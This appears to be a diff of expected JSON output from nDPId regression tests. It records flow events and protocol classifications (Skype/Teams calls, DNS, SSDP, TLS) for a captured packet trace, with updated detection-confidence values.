+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634728,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634728,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 